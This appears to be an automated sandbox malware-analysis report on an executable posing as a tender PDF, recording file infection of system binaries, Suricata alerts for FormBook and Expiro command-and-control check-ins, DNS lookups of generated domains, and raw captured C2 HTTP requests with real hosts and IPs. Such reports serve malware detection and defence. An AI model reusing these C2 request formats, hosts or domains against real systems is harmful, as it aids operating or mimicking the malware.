Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:59696 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49719 -> 52.11.240.239:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49809 -> 34.227.7.138:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49797 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49806 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49800 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49800 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49821 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49801 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49773 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49773 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:61358 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49799 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49817 -> 37.27.60.109:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49798 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49803 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49812 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49812 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49786 -> 199.59.243.160:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49790 -> 199.59.243.160:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49790 -> 199.59.243.160:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49816 -> 37.27.60.109:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49807 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49819 -> 37.27.60.109:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49819 -> 37.27.60.109:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49802 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49808 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 199.59.243.160:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49782 -> 199.59.243.160:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49818 -> 37.27.60.109:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49823 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49823 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.4:63151 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49804 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49804 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49820 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49822 -> 13.248.169.48:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.minimalbtc.xyz
Source:	DNS query: www.dappbtc.xyz
Source:	DNS query: www.stakemask.xyz
Source:	DNS query: www.agistaking.xyz
Source:	DNS query: www.publicblockchain.xyz

Queries random domain names (often used to prevent blacklisting and sinkholes)

Source: unknown

DNS traffic detected: English language letter frequency does not match the domain names

Source: unknown

Network traffic detected: DNS query count 72

Source: Joe Sandbox View	IP Address: 13.248.148.254 13.248.148.254
Source: Joe Sandbox View	IP Address: 165.160.15.20 165.160.15.20

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.4:49721
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.11.240.239:80 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.11.240.239:80 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.4:49721
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49793
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49793
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.26.80.133:80 -> 192.168.2.4:49779
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.26.80.133:80 -> 192.168.2.4:49779
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.229.117.57:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.227.7.138:80 -> 192.168.2.4:49750
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.227.7.138:80 -> 192.168.2.4:49750
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.229.117.57:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.43.119.120:80 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.43.119.120:80 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.212.150.54:80 -> 192.168.2.4:49783
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.212.150.54:80 -> 192.168.2.4:49783

Source: global traffic	HTTP traffic detected: POST /otmedx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /bfmkxghefe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 840
Source: global traffic	HTTP traffic detected: POST /xrrxkd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /mlblrfhjcmrnqnv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 840
Source: global traffic	HTTP traffic detected: POST /ytk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /hiywnvofiuyj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /xgeytf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: GET /xgeytf?usid=18&utid=30329236071 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /afiiabxhlnglh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: GET /afiiabxhlnglh?usid=18&utid=30329236284 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /gbtwijy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /soqqg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /pefpywqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /cmujh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /o HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 838
Source: global traffic	HTTP traffic detected: POST /xeorsulw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 838
Source: global traffic	HTTP traffic detected: POST /wmvb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: GET /j422/?lr9=2FpdhzjhhJt&SBX=FUOfllrMHRVlL2mP9dpFtlJ7w5e63t2rBG4iChoHy9jO0xa6Gzw56eLBxdOIk/dIKvPqMZj+oWY7sauAPMCxWZArGu+MyfyU7LQKnbq/Om18e125mnYqe98= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.minimalbtc.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
Source: global traffic	HTTP traffic detected: POST /s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /ljleu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /wpgcvvhma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /eybwjmeppxlcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /xekypngstqrnaewh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: GET /xekypngstqrnaewh?usid=18&utid=30329248424 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /ldffypnuwfixybeu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: GET /ldffypnuwfixybeu?usid=18&utid=30329248680 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /qcjpf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /cqdsdlfjvcligqer HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
